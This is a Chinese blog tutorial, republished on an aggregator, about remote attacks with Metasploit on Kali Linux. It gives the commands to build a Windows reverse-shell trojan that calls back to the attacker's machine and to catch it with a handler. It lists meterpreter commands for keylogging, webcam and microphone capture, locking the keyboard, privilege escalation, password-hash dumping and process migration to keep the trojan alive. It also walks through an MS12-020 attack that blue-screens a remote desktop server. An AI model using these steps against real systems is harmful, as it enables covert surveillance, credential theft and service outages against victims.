2. 程式人生 > >kali linux 遠程攻擊

kali linux 遠程攻擊

阿新 發佈:2017-06-30
安全入門文章

Metasploit

1啟動:msfconsole

技術分享

技術分享

exploit 漏洞利用工具

payloads ----àshellcode 漏洞利用後執行的代碼

木馬 控制 服務器

遠程控制 木馬程序

2.根據自己的ip生成一個木馬

msfpayload windows/meterpreter/reverse_tcp LHOST=linuxip LPORT=55555 X > test.exe

windows/meterpreter/reverse_tcp 目錄

LHOST 本地的IP

LPORT 端口 (高端口容易過防火墻)

X 二進制 > test.exe 二進制文件(木馬程序)

技術分享

技術分享主文件夾下

3.技術分享

use exploit/multi/handler

使用handler這個模塊

4.使用show options 查看參數(發現無參數)

.技術分享

5.直接選下一個 set PAYLOAD windows/meterpreter/reverse_tcp

reverse_tcp 反向的鏈接(使用 shellcold 程序

技術分享

6.此時再次查看參數 show options

技術分享

LHOST = 生成木馬的linux IP 地址 (均要填寫)

LPORT = 高端口 55555

7.填寫生成木馬的ip 以及端口

set LHOST linux IP

set LPORT 55555

技術分享

生成完後,再次查看是否填寫 show options

技術分享

8.執行 exploit (等待鏈接狀態)

等待點擊木馬

Metasploit(工具使用)

background 將會話放入後臺

sessions -l 查看後臺的會話

sessions -i 1 切換回剛才的會話

註入進程(防止木馬被關閉)

ps 得到想要的PID進程

migrate PID 註入

216 184 explorer.exe 桌面管理進程)

migrate 216 註入

(查看進程 PS

例如 meterpreter> run vnc 開啟遠程桌面

文件管理功能 file system commands

download

edit (編輯文件) 後面直接加文件名

cat(查看文件)

mkdir (創建文件夾)

mv (移動文件)

rm (刪除文件)

upload (上傳)

rmdir (刪除文件夾)

網絡和系統操作 Networking commands

arp (查看arp緩存表)

getproxy (獲取本機的代理)

ifconfig

ipconfig

netstat (查看本機的端口鏈接)

系統操作

kill 結束進程 (後面直接跟進程的PID號)

ps 查看進程

reboot 重啟

reg 修改註冊表

shell 獲取終端

shutdown 關機

sysinfo 獲取電腦信息

用戶和其余操作 user interface commands

enumdesktops 用戶登錄數

keyscan_dump 鍵盤記錄_下載

keyscan_start 鍵盤記錄_開始

keyscan_stop 鍵盤記錄_停止

uictl 獲得鍵盤鼠標控制權

攝像頭操作

record_mic 音頻錄制

webcam_chat 查看攝像頭接口

webcam_list 查看攝像頭列表

webcam_stream 攝像頭視頻錄制

getsystem 獲取高權限

hashdump 下載管理員的哈希密文

鍵盤記錄的用法

1.keyscan_start 開始記錄

2). 再次 keyscan_dump 下載查看記錄

3. Keyscan_stop 停止監聽

鍵盤鼠標的鎖定

uictl -h 查看參數

enable(打開) disable(鎖定) keyboard(鍵盤) mouse(鼠標)

例:uictl disable keyboard 鎖定鍵盤

註:鍵盤鎖定時,win+E 任然可以用

音頻錄制:先查看參數在錄制

Metasploit(服務器藍屏攻擊)

條件:服務器必須開啟 3389 端口( netstat an 可進行查看)

目標:(DDOS 攻擊192.168.X.X

漏洞名稱:MS12020

1啟動:msfconsole

2.輸入 search ms12-020

解釋:

auxiliary/dos/windows/rdp/ms12_020_maxchannelids

服務器遠程桌面的模塊

auxiliary/scanner/rdp/ms12_020_check

查看是否存在該漏洞

3. 檢查 use auxiliary/scanner/rdp/ms12_020_check

(查看參數 show options)

RHOSTS R開頭為遠程主機

4.set RHOSTS 服務器的IP

5. 查看該端口是否存在 exploit

6.換模塊 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

7.查看參數 show options

寫入IP : set RHOST 服務器IP 再次查看是否設置成功

8.重新開一個終端,用ping (服務器) :正常應為ping

(在網站的搜索欄,進入看是否能進入:輸入服務器的IP

9. 輸入 exploit 攻擊開始

結果:服務器藍屏,無法ping

開啟:3389

http://blog.csdn.net/bekilledlzy/article/details/1817637

Ms12-020解決措施

http://cert.ecnu.edu.cn/s/182/t/261/67/49/info26441.htm

註:

如果對方開啟了防火墻或者修改了3389端口,可以通過下面方式查看:有一個 XXXX/tcp open realserver (可疑)

端口講解

http://vip.2cto.com/jc/241.html


本文出自 “10883981” 博客,轉載請與作者聯系!

kali linux 遠程攻擊

相關推薦

kali linux 攻擊

安全入門文章Metasploit1啟動:msfconsole exploit 漏洞利用工具payloads ----àshellcode 漏洞利用後執行的代碼 木馬 控制 服務器 遠程控制 木馬程序 2.根據自己的ip生成一個木馬msfpayload

linux登錄工具

wan 技術 工具 inux linux alt jpg img ssh協議 ssh協議原理 linux遠程登錄工具

Linux管理器xshell和xftp使用教程

win ssh1 ros html ssh nbsp ssh2 tel 基於 1.xshell 是一個強大的安全終端模擬軟件,它支持SSH1, SSH2, 以及Microsoft Windows 平臺的TELNET 協議。 2.是一個基於 MS windows 平臺的功能強

使用windows調用Linux桌面

password windows display server adjust 一、安裝所需要的軟件yum install -y xrdpyum install -y vnc*chkconfig xrdp onchkconfig vncserver on二、修改配置a添加用戶:useradd

Linux登陸

src restart 如果 mod 遠程登陸 遠程 log 配置 開啟 1. 遠程機器root賬號(也可以是自定義的賬號abc). 進入.ssh/authorized_keys 文件。沒有的話在用戶下新建一個相同目錄的文件出來 2. 將本地登陸機的%userprofile

Linux桌面(三)

ets start isp bak onf x11 oda lin 修改 上一篇中的vnc配置已經很方便了,這一篇介紹更為簡單的xmanager的配置,xmanager畫面好一丟丟。

expect - linux執行命令

expect需要的文件:password #遠程主機的ip 密碼文件expect #執行遠程登錄,執行命令的腳本文件login.sh #shell 腳步調用這兩個文件執行操作#!/bin/bash for i in $(awk ‘{print $1}‘ passwd.txt)

linux 執行命令

設置 推薦 color 標準 對話 執行 col spa 安靜 命令: ssh 命令參數: -l 指定登入用戶 -p 設置端口號 -f 後臺運行,並推薦加上 -n 參數 -n 將標準輸入重定向到 /dev/null,防止讀取標準輸入 -N 不

1周第3課 Linux管理工具 putty xshell 密鑰登陸

linux putty xshll 密鑰登陸Linux下常用的兩類遠程管理工具:一個是基於CLI(命令行模式)ssl telnet,另一個是基於GUI(圖形用戶界面模式)的VNC。常用的命令行工具有:Putty、SecureCRT、WinSCP、xshell 今天主要講解Putty、xshell這兩種安裝使

Linux--聯機 ssnkey加密

ssnkey一、openssh-server功能:讓遠程主機可以通過網絡訪問sshd服務,開始一個安全shell二、客戶端連接方式 ssh 遠程主機用戶@遠程主機ip [root@desktop0 ~]# ifconfig ##查看本機IP帳號,可以在要登陸的主機上

Linux登錄工具XShell安裝

遠程登錄 ati 接受 xshell 就是 足夠 軟件 images 輸入 Xshell就是一個遠程控制RHEL的軟件;其他的還有很多,用什麽都無所謂(根據公司情況)。 下面我們來安裝下這個工具: 雙擊exe 點下一步: 選 免費的 然後下一步:(免費的功能足

如何修改Linux端口/如何修改ssh端口?

圖片 -i dea bbb ssh 文件 ref spa 重啟 1.首先我們遠程進去 linux2.ssh的配置文件是在/etc/ssh/sshd_config這個文件裏的3.我們修改端口就是通過編輯這個文件實現vi /etc/ssh/sshd_config4.找到#por

Linux增量備份-Rsync

bcp 實時 install root ets post 通過 端口 遞歸 Rsync使用的Rsync算法來使本地和遠程主機的文件達到同步,這個算法只傳送兩個文件的不同部分,從而實現增量備份 特點: 能同步整個目錄、樹和文件系統 有選擇性的保持符號鏈接、硬連接、文件屬主、權

linux 連接報錯 10038或者10061 或者10060

折騰 解決 http 開啟 報錯 mysq clas 自己 是否 1.檢查linux的mysql是否開啟 2.檢查mysql的user表的host是否是% 3.檢查my.cnf文件是否綁定本地 4.防火墻3306端口是否開啟 假如以上都沒問題,那最大的原因就是我折騰了很久的

虛擬機linux 訪問 windows7

linux遠程訪問 windows71: dev/cdrom 臨時掛載到 /mnt 按df -h 查看掛載狀態 2:設置自動掛載#vim /etc/fstab 編輯 3:進去vim文本編輯 按o 到最下行開始編輯 4:輸入 /dev/sro /mnt iso

Linux連接

Linux系統遠程連接 遠程連接就是在遠程連接另外一臺計算機。當某臺計算機開啟了遠程桌面連接功能後我們就可以在網絡的另一端控制這臺計算機了,通過遠程桌面功能我們可以實時的操作這臺計算機,在上面安裝軟件,運行程序,所有的一切都像是直接在該計算機上操作一樣。 今天我們一起學習一下使用Linux系統遠程連

linux登錄windows服務器

rdesktop遠程登錄 登錄密碼錯誤 windows遠程登錄設置 IP設置 linux遠程登錄到windows服務器,有兩種比較常用的方法。一種是為windows裝上一個名為VNC Server的軟件,這樣linux就可以通過VNC登錄到windows服務器了。另一種方法就是借助linux下

Linux登陸Windows系統

Linux 遠程登陸 Windows第一步,實現Linux主機與Windows主機互聯互通是實現遠程登陸的前提條件首先基於VMware環境搭建的Linux主機與Windows主機網絡模式選擇“僅主機模式”。 接著關閉被遠程端Windows7的防火墻,在運行界面輸入“firewall.cpl”,打開Window

Linux訪問

Linux遠程訪問Liunx遠程操控的安裝文件首先光驅在liunx系統右下角有一個小光盤右擊設置進入CD/DVD設備狀態選項勾上1:我們在進行安裝遠程文件包的時候要先找一個空文件進行掛載我這邊選用的是/mnt文件夾這是裝系統的時候裝上去的自帶空文件夾我們可以先看一下然後ls查看一下裏面有沒有東西 2:需要掛載

安裝軟件包和Linux操縱Windows系統

安裝軟件包和Linux遠程操縱Windo1.打開VMware Workstation Pro,並打開Windows 7。2.輸入密碼,並按回車鍵。3.開啟虛擬機rhk-2。4.輸入用戶名為root,並按回車鍵。5.輸入密碼,並按回車鍵。6.選中“不要再顯示此信息”,並點擊“關閉”。7.打開虛擬機設置。8.在C